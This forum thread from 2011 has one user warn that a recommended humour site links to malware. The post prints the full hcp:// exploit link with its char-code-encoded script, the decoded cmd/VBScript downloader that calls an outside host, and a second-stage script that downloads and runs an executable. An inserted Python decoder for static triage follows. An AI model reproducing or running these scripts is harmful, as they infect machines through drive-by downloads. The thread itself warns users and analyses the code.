<3 this site


Dead
04-11-2011, 03:08
http://www.fmylife.com/

it cheers me up every time :P

Naedion
04-11-2011, 09:06
hm you sure this is a trustable site?

the site contains a script hidden in a link
========================
hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%% A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%% A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A. .%5C..%5Csysinfomain.htm?svr=<script defer>eval(Run(String.fromCharCode(99,109,100,32,47,99,3 2,101,99,104,111,32,66,61,34,108,46,118,98,115,34, 58,87,105,116,104,32,67,114,101,97,116,101,79,98,1 06,101,99,116,40,34,77,83,88,77,76,50,46,88,77,76, 72,84,84,80,34,41,58,46,111,112,101,110,32,34,71,6 9,84,34,44,34,104,116,116,112,58,47,47,114,97,102, 116,111,122,97,46,99,111,109,47,99,111,110,116,101 ,110,116,47,104,99,112,95,118,98,115,46,112,104,11 2,63,102,61,51,54,38,100,61,48,34,44,102,97,108,11 5,101,58,46,115,101,110,100,40,41,58,83,101,116,32 ,65,32,61,32,67,114,101,97,116,101,79,98,106,101,9 9,116,40,34,83,99,114,105,112,116,105,110,103,46,7 0,105,108,101,83,121,115,116,101,109,79,98,106,101 ,99,116,34,41,58,83,101,116,32,68,61,65,46,67,114, 101,97,116,101,84,101,120,116,70,105,108,101,40,65 ,46,71,101,116,83,112,101,99,105,97,108,70,111,108 ,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,6 6,41,58,68,46,87,114,105,116,101,76,105,110,101,32 ,46,114,101,115,112,111,110,115,101,84,101,120,116 ,58,69,110,100,32,87,105,116,104,58,68,46,67,108,1 11,115,101,58,67,114,101,97,116,101,79,98,106,101, 99,116,40,34,87,83,99,114,105,112,116,46,83,104,10 1,108,108,34,41,46,82,117,110,32,65,46,71,101,116, 83,112,101,99,105,97,108,70,111,108,100,101,114,40 ,50,41,32,43,32,34,92,34,32,43,32,66,32,62,32,37,8 4,69,77,80,37,92,92,108,46,118,98,115,32,38,38,32, 37,84,69,77,80,37,92,92,108,46,118,98,115,32,38,38 ,32,116,97,115,107,107,105,108,108,32,47,70,32,47, 73,77,32,104,101,108,112,99,116,114,46,101,120,101 )));</script>
========================

the colored part translated:

========================
cmd /c echo B="l.vbs":With CreateObject("MSXML2.XMLHTTP"):.open "GET","http://raftoza.com/content/hcp_vbs.php?f=36&d=0",false:.send():Set A = CreateObject("Scripting.FileSystemObject"):Set D=A.CreateTextFile(A.GetSpecialFolder(2) + "\" + B):D.WriteLine .responseText:End With:D.Close:CreateObject("WScript.Shell").Run A.GetSpecialFolder(2) + "\" + B > %TEMP%\\l.vbs && %TEMP%\\l.vbs && taskkill /F /IM helpctr.exe
========================

execute a vbs script, start the command shell, get code from
a website then execute the downloaded script

the code from the website http:// raftoza.com / content / hcp_vbs. php ?f=36 &d=0

========================
w=3000:x=200:y=1:z=false:a = "http://raftoza.com/w.php?e=7&f=36":Set e = Createobject(StrReverse("tcejbOmetsySeliF.gnitpircS")):Set f=e.GetSpecialFolder(2):b = f & "\exe.ex2":b=Replace(b,Month("2010-02-16"),"e"):OT = "GET":Set c = CreateObject(StrReverse("PTTHLMX.2LMXSM")):Set d = CreateObject(StrReverse("maertS.BDODA")) Set o=Createobject(StrReverse("tcejbOmetsySeliF.gnitpircS")) On Error resume next c.open OT, a, z:c.send() If c.Status = x Then d.Open:d.Type = y:d.Write c.ResponseBody:d.SaveToFile b:d.Close End If Set w=CreateObject(StrReverse("llehS." & "tpi"&"rcSW")) Eval(Replace("W.ex2c b", Month("2010-02-16"), "E")) W.eXeC "taskkill /F /IM wmplayer.exe":W.eXeC "taskkill /F /IM realplay.exe":Set g=o.GetFile(e.GetSpecialFolder(2) & "\" & StrReverse("bv.l") & "s"):g.Delete:WScript.Sleep w:Set g=o.GetFile(b):g.Delete
========================

this code connects again to the webserver and downloads an .exe file, for example contact.ext, readme.exe ...

:banana:
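The two decoding steps walked through in the post above (the `String.fromCharCode` list, then the `StrReverse` literals in the second stage) can be done statically, without running the script. This is an added example, not part of the original thread; the sample input is constructed and harmless, and the function names are assumptions.

```python
import re

FROMCHARCODE = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")
STRREVERSE = re.compile(r'StrReverse\("([^"]*)"\)', re.I)
CREATEOBJECT = re.compile(r'CreateObject\("([^"]+)"\)', re.I)
URL = re.compile(r"(?:https?|hcp)://[^\s\"'<>]+", re.I)

def decode_fromcharcode(text):
    """Return the plaintext of every String.fromCharCode(...) call in text."""
    decoded = []
    for match in FROMCHARCODE.finditer(text):
        # Forum line-wrapping splits numbers ("3 2"); commas are the only separators.
        digits = re.sub(r"\s+", "", match.group(1))
        decoded.append("".join(chr(int(n)) for n in digits.split(",") if n))
    return decoded

def unreverse(vbs):
    """Replace StrReverse("...") with the string it evaluates to.
    Only single-literal arguments are handled, not concatenations ("a" & "b")."""
    return STRREVERSE.sub(lambda m: '"' + m.group(1)[::-1] + '"', vbs)

def defang(url):
    """Make a URL non-clickable for notes and tickets."""
    return re.sub(r"^http", "hxxp", url, flags=re.I).replace(".", "[.]")

def triage(text):
    """Peel both layers; list defanged URLs and the COM objects the script creates."""
    layers = [unreverse(p) for p in decode_fromcharcode(text)] or [unreverse(text)]
    urls, objects = [], []
    for layer in layers:
        urls += [defang(u) for u in URL.findall(layer)]
        objects += CREATEOBJECT.findall(layer)
    return {"layers": layers, "urls": urls, "objects": objects}

# Constructed sample (not the payload from the thread): an inert VBScript fragment.
STAGE = ('Set c = CreateObject(StrReverse("PTTHLMX.2LMXSM")):'
         'c.open "GET","http://example.invalid/s.php",false')
CODES = ",".join(str(ord(ch)) for ch in STAGE)
# Re-create the wrap damage seen in the post: a stray space every 40 characters.
SAMPLE = ("<script defer>eval(Run(String.fromCharCode("
          + " ".join(CODES[i:i + 40] for i in range(0, len(CODES), 40))
          + ")));</script>")

if __name__ == "__main__":
    report = triage(SAMPLE)
    print(report["layers"][0])
    print(report["urls"], report["objects"])
```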

Dead
04-11-2011, 14:06
Hm, it's also an app for iPhones. That's where I found it from.

Imrahil
04-11-2011, 17:35
Sounds dubious, my Kaspersky didn't like it one bit...

Kikthin
04-11-2011, 17:54
You live in Germany. Everything is dubious there!